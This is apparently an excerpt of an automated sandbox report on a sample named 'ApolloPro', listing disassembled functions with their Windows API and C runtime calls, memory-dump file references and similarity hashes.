                                                                                              Function 006459D3 Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _memset.LIBCMT ref: 006459F9
                                                                                              • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00645A9E
                                                                                              • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00645ABB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: IconNotifyShell_$_memset
                                                                                              • String ID:
                                                                                              • API String ID: 1505330794-0
                                                                                              • Opcode ID: 0f5c56db8865d127b78c2cf1bd375c676d6efa32d66fc9d7c4f954c1b976341a
                                                                                              • Instruction ID: a0f2b8052b3e9ca7c6cd0db35d8664ca08b2b41b5f76ef6052771227083c5c29
                                                                                              • Opcode Fuzzy Hash: 0f5c56db8865d127b78c2cf1bd375c676d6efa32d66fc9d7c4f954c1b976341a
                                                                                              • Instruction Fuzzy Hash: 743173B0505701CFD760DF24D8846A7BBE9FB49309F000A2EF59B87351E771AA84CB92
                                                                                              Function 0065593C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __FF_MSGBANNER.LIBCMT ref: 00655953
                                                                                                • Part of subcall function 0065A39B: __NMSG_WRITE.LIBCMT ref: 0065A3C2
                                                                                                • Part of subcall function 0065A39B: __NMSG_WRITE.LIBCMT ref: 0065A3CC
                                                                                              • __NMSG_WRITE.LIBCMT ref: 0065595A
                                                                                                • Part of subcall function 0065A3F8: GetModuleFileNameW.KERNEL32(00000000,006F53BA,00000104,?,00000001,00651003), ref: 0065A48A
                                                                                                • Part of subcall function 0065A3F8: ___crtMessageBoxW.LIBCMT ref: 0065A538
                                                                                                • Part of subcall function 006532CF: ___crtCorExitProcess.LIBCMT ref: 006532D5
                                                                                                • Part of subcall function 006532CF: ExitProcess.KERNEL32 ref: 006532DE
                                                                                                • Part of subcall function 00658D58: __getptd_noexit.LIBCMT ref: 00658D58
                                                                                              • RtlAllocateHeap.NTDLL(00DC0000,00000000,00000001,?,?,?,?,00651003,?,0000FFFF), ref: 0065597F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                              • String ID:
                                                                                              • API String ID: 1372826849-0
                                                                                              • Opcode ID: 01fbef2d608f4b8cc89798075f5aef1702d692d76dd218a521aa8b5df87db360
                                                                                              • Instruction ID: a2103c2e1ad996521b4f9cdd32f41bed9d4ff6264f56882564da065a01cc6e8d
                                                                                              • Opcode Fuzzy Hash: 01fbef2d608f4b8cc89798075f5aef1702d692d76dd218a521aa8b5df87db360
                                                                                              • Instruction Fuzzy Hash: 7F012631201B91DEE7502764D826A6E335BCF42773F10022AFD16AB691DE748D084665
                                                                                              Function 006992C8 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 006992D6
                                                                                                • Part of subcall function 00652F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00659C54,00000000,00658D5D,006559C3,?), ref: 00652F99
                                                                                                • Part of subcall function 00652F85: GetLastError.KERNEL32(00000000,?,00659C54,00000000,00658D5D,006559C3,?), ref: 00652FAB
                                                                                              • _free.LIBCMT ref: 006992E7
                                                                                              • _free.LIBCMT ref: 006992F9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
                                                                                              • Instruction ID: a7e530584a086eb6eb7f6a68c60b7d45df449bf59130073b78d43c97a3aaf29b
                                                                                              • Opcode Fuzzy Hash: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
                                                                                              • Instruction Fuzzy Hash: 55E0C2A120470353CE20A67D7850ED377ED0F88312F14040EB809D3642CE20E840803C
                                                                                              Function 00697221 Relevance: 4.5, APIs: 3, Instructions: 21COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(0000002C,00000000,?,00000002,00000000,?,00697016,00000000,?,0069710A,00000000,00000000,00672F49), ref: 00697237
                                                                                              • GetCurrentProcess.KERNEL32(?,00000000,?,00697016,00000000,?,0069710A,00000000,00000000,00672F49), ref: 0069723F
                                                                                              • DuplicateHandle.KERNELBASE(00000000,?,00697016,00000000,?,0069710A,00000000,00000000,00672F49), ref: 00697246
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentProcess$DuplicateHandle
                                                                                              • String ID:
                                                                                              • API String ID: 1294930198-0
                                                                                              • Opcode ID: 93ad05d9d6deef7f66d195caf3aeb0d39438faae983b5b3e5d49ddb8cad1d7b5
                                                                                              • Instruction ID: 37e000369ef15d9776e3986342fb9332466183f3eebc6ef303a650e9e2c26a74
                                                                                              • Opcode Fuzzy Hash: 93ad05d9d6deef7f66d195caf3aeb0d39438faae983b5b3e5d49ddb8cad1d7b5
                                                                                              • Instruction Fuzzy Hash: 16D02E3A020300FFEB011BE5EC0DF3B7B3EDBC1B22F20401AF204866109A7485015620
                                                                                              Function 00697079 Relevance: 4.5, APIs: 3, Instructions: 17COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 006977EB: InterlockedExchange.KERNEL32(?,?), ref: 006977FE
                                                                                                • Part of subcall function 006977EB: EnterCriticalSection.KERNEL32(?,?,0063C2B6,?,?), ref: 0069780F
                                                                                                • Part of subcall function 006977EB: TerminateThread.KERNEL32(00000000,000001F6,?,0063C2B6,?,?), ref: 0069781C
                                                                                                • Part of subcall function 006977EB: WaitForSingleObject.KERNEL32(00000000,000003E8,?,0063C2B6,?,?), ref: 00697829
                                                                                                • Part of subcall function 006977EB: InterlockedExchange.KERNEL32(?,000001F6), ref: 0069783C
                                                                                                • Part of subcall function 006977EB: LeaveCriticalSection.KERNEL32(?,?,0063C2B6,?,?), ref: 00697843
                                                                                              • CloseHandle.KERNELBASE(?,?,006970DF), ref: 0069708A
                                                                                              • CloseHandle.KERNEL32(?,?,006970DF), ref: 00697093
                                                                                              • DeleteCriticalSection.KERNEL32(?,?,006970DF), ref: 006970A6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalSection$CloseExchangeHandleInterlocked$DeleteEnterLeaveObjectSingleTerminateThreadWait
                                                                                              • String ID:
                                                                                              • API String ID: 2929296749-0
                                                                                              • Opcode ID: cac5bb6cc73d0520b23a6a164f794afdfa129f9123686acea5be5e0b9c1919c6
                                                                                              • Instruction ID: 966c6a68b2ea3d22f3eb67b27901bffe64f67cbe86e7c3b1753518ce28946e9b
                                                                                              • Opcode Fuzzy Hash: cac5bb6cc73d0520b23a6a164f794afdfa129f9123686acea5be5e0b9c1919c6
                                                                                              • Instruction Fuzzy Hash: 85E0E236000687EBCB812FA4FC08CA9BF7BBF487113241526F40986A70DB71A4A4CB51
                                                                                              Function 00635E83 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 551COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: CALL
                                                                                              • API String ID: 0-4196123274
                                                                                              • Opcode ID: 9e2ad0f712e534a4cbeab1e15b049f1ece516c4cf1d855b0ca33f01c05662856
                                                                                              • Instruction ID: f2dcd44f624c981bdedb05e7db3b2c13b7dc5c7a4cf6d8ac53a5b983d3dfe6b2
                                                                                              • Opcode Fuzzy Hash: 9e2ad0f712e534a4cbeab1e15b049f1ece516c4cf1d855b0ca33f01c05662856
                                                                                              • Instruction Fuzzy Hash: 43325874508301EFDB64DF14C590A6AB7E2BF85300F15896DF88A9B362D731ED85CB86
                                                                                              Function 006AE139 Relevance: 3.2, APIs: 2, Instructions: 227COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _strcat.LIBCMT ref: 006AE20C
                                                                                                • Part of subcall function 00634D37: __itow.LIBCMT ref: 00634D62
                                                                                                • Part of subcall function 00634D37: __swprintf.LIBCMT ref: 00634DAC
                                                                                              • _wcscpy.LIBCMT ref: 006AE29B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: __itow__swprintf_strcat_wcscpy
                                                                                              • String ID:
                                                                                              • API String ID: 1012013722-0
                                                                                              • Opcode ID: 627e2fbb702d1a9299b5b80a6af60f801f4141ae77acff0461317d209c043c06
                                                                                              • Instruction ID: 6ce4e4b2d9ac899a071c6cdf27d739c953ecc7d653d1f08a5bc3447e814309a3
                                                                                              • Opcode Fuzzy Hash: 627e2fbb702d1a9299b5b80a6af60f801f4141ae77acff0461317d209c043c06
                                                                                              • Instruction Fuzzy Hash: 05913835A00605DFCB58EF18C5919A9B7E6FF4A310B55809EE80A8F362DB32ED41CF85
                                                                                              Function 00650E38 Relevance: 3.1, APIs: 2, Instructions: 94processCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CloseHandle.KERNELBASE ref: 00650ED5
                                                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 00650EE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseCreateHandleSnapshotToolhelp32
                                                                                              • String ID:
                                                                                              • API String ID: 3280610774-0
                                                                                              • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                              • Instruction ID: af5c284bca429ddf20b2a657288493416dd7d9ca8cae46508e69c95c864e43f1
                                                                                              • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                              • Instruction Fuzzy Hash: DB31B771A0010A9BE718DF58C4819A9F7A6FF59301F788AA5E809CB352E731EDC5CB80
                                                                                              Function 00645F8B Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • IsThemeActive.UXTHEME ref: 00645FEF
                                                                                                • Part of subcall function 0065359C: __lock.LIBCMT ref: 006535A2
                                                                                                • Part of subcall function 0065359C: DecodePointer.KERNEL32(00000001,?,00646004,00688892), ref: 006535AE
                                                                                                • Part of subcall function 0065359C: EncodePointer.KERNEL32(?,?,00646004,00688892), ref: 006535B9
                                                                                                • Part of subcall function 00645F00: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00645F18
                                                                                                • Part of subcall function 00645F00: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00645F2D
                                                                                                • Part of subcall function 00645240: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0064526C
                                                                                                • Part of subcall function 00645240: IsDebuggerPresent.KERNEL32 ref: 0064527E
                                                                                                • Part of subcall function 00645240: GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 006452E6
                                                                                                • Part of subcall function 00645240: SetCurrentDirectoryW.KERNEL32(?), ref: 00645366
                                                                                              • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 0064602F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                                              • String ID:
                                                                                              • API String ID: 1438897964-0
                                                                                              • Opcode ID: 28add45b4bc5e1f4aba2c7f5ff835b1248095db79705771aa4ed82ea56493f0c
                                                                                              • Instruction ID: f8a0d9c3aaf41c8db4f00c206baac15fbab0d34861f1ffdf798d1cbe97417640
                                                                                              • Opcode Fuzzy Hash: 28add45b4bc5e1f4aba2c7f5ff835b1248095db79705771aa4ed82ea56493f0c
                                                                                              • Instruction Fuzzy Hash: 6811AF719083019FC310EF68ED0592AFBEAEF99710F00451EF444872B2DBB0AA49CF96
                                                                                              Function 0065581D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: __lock_file_memset
                                                                                              • String ID:
                                                                                              • API String ID: 26237723-0
                                                                                              • Opcode ID: a57e2f260272770cbdef7bd1bcf94dcbaff173a0b0d5453d1c6c67ff2a5ca49e
                                                                                              • Instruction ID: 55f330fffe90176f111adbfd0f0f4d0520b2a19e8745408a1171c1c3ed9ecb53
                                                                                              • Opcode Fuzzy Hash: a57e2f260272770cbdef7bd1bcf94dcbaff173a0b0d5453d1c6c67ff2a5ca49e
                                                                                              • Instruction Fuzzy Hash: 9701D431800758EBCF51AF66CC069CF7B63AF90362F144119BC252B2A1DB318A19DF91
                                                                                              Function 006555C6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00658D58: __getptd_noexit.LIBCMT ref: 00658D58
                                                                                              • __lock_file.LIBCMT ref: 0065560B
                                                                                                • Part of subcall function 00656E3E: __lock.LIBCMT ref: 00656E61
                                                                                              • __fclose_nolock.LIBCMT ref: 00655616
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                              • String ID:
                                                                                              • API String ID: 2800547568-0
                                                                                              • Opcode ID: 08d47782d167794e3fba26e177a3e666966ae4138e9b128321578ae7ba51c2fb
                                                                                              • Instruction ID: 915a2adf1442599c01535af7a6b2be7e08effd6411a97df28952293937fb3868
                                                                                              • Opcode Fuzzy Hash: 08d47782d167794e3fba26e177a3e666966ae4138e9b128321578ae7ba51c2fb
                                                                                              • Instruction Fuzzy Hash: 43F0F0B1802B059AD7906B25881A76E77E36F00333F21820DAC26AB1D1DB7C4A0A8B49
                                                                                              Function 00696FDA Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(00000014,00000FA0,00000001,00000000,?,0069710A,00000000,00000000,00672F49), ref: 00696FFF
                                                                                              • InterlockedExchange.KERNEL32(00000034,00000000), ref: 00697021
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: CountCriticalExchangeInitializeInterlockedSectionSpin
                                                                                              • String ID:
                                                                                              • API String ID: 4104817828-0
                                                                                              • Opcode ID: af842886a75f91d8bef817d71559643626c9f9cc1f6208df4172892dbb5edf3c
                                                                                              • Instruction ID: c8e29ee3e2fef4938270a5e20040e92cccea25f5737fea7ac867ae72a9d1bb55
                                                                                              • Opcode Fuzzy Hash: af842886a75f91d8bef817d71559643626c9f9cc1f6208df4172892dbb5edf3c
                                                                                              • Instruction Fuzzy Hash: 41F034B11107059FD3209F56D948CA7FBEDEF84710B00882EE48A87A10C7B4A501CB61
                                                                                              Function 00655E80 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __lock_file.LIBCMT ref: 00655EB4
                                                                                              • __ftell_nolock.LIBCMT ref: 00655EBF
                                                                                                • Part of subcall function 00658D58: __getptd_noexit.LIBCMT ref: 00658D58
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                                                              • String ID:
                                                                                              • API String ID: 2999321469-0
                                                                                              • Opcode ID: 58483dbf3117a3cbab9796f0867d7803c33a285e6967b98aa26c98c5b54d26f2
                                                                                              • Instruction ID: 24af8c3fb6d4727a1de5ed2e2e343e8ef5cd8eea634a30635f94ad7661c7a974
                                                                                              • Opcode Fuzzy Hash: 58483dbf3117a3cbab9796f0867d7803c33a285e6967b98aa26c98c5b54d26f2
                                                                                              • Instruction Fuzzy Hash: 22F0A0319117159EDB80BB74880779E72A26F41333F21420EBC21BB1D2CF788E0A9B99
                                                                                              Function 00645AC3 Relevance: 3.0, APIs: 2, Instructions: 25windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _memset.LIBCMT ref: 00645AEF
                                                                                              • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00645B1F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: IconNotifyShell__memset
                                                                                              • String ID:
                                                                                              • API String ID: 928536360-0
                                                                                              • Opcode ID: 67a7ec030fb93bba3311a147df645e4d030e52ee889d9b6c29948d55af7c1a36
                                                                                              • Instruction ID: 242dd54b13a6f318f9d17c0e269ed90f953341b9696f0c0e7453945163d5fc51
                                                                                              • Opcode Fuzzy Hash: 67a7ec030fb93bba3311a147df645e4d030e52ee889d9b6c29948d55af7c1a36
                                                                                              • Instruction Fuzzy Hash: 7DF0A7708083189FE7928B24DC497E677BD970030CF0001EABA4896292D7710B98CF95
                                                                                              Function 006532CF Relevance: 3.0, APIs: 2, Instructions: 7COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___crtCorExitProcess.LIBCMT ref: 006532D5
                                                                                                • Part of subcall function 0065329B: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,?,006532DA,00651003,?,00659EEE,000000FF,0000001E,006ECE28,00000008,00659E52,00651003,00651003), ref: 006532AA
                                                                                                • Part of subcall function 0065329B: GetProcAddress.KERNEL32(?,CorExitProcess), ref: 006532BC
                                                                                              • ExitProcess.KERNEL32 ref: 006532DE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
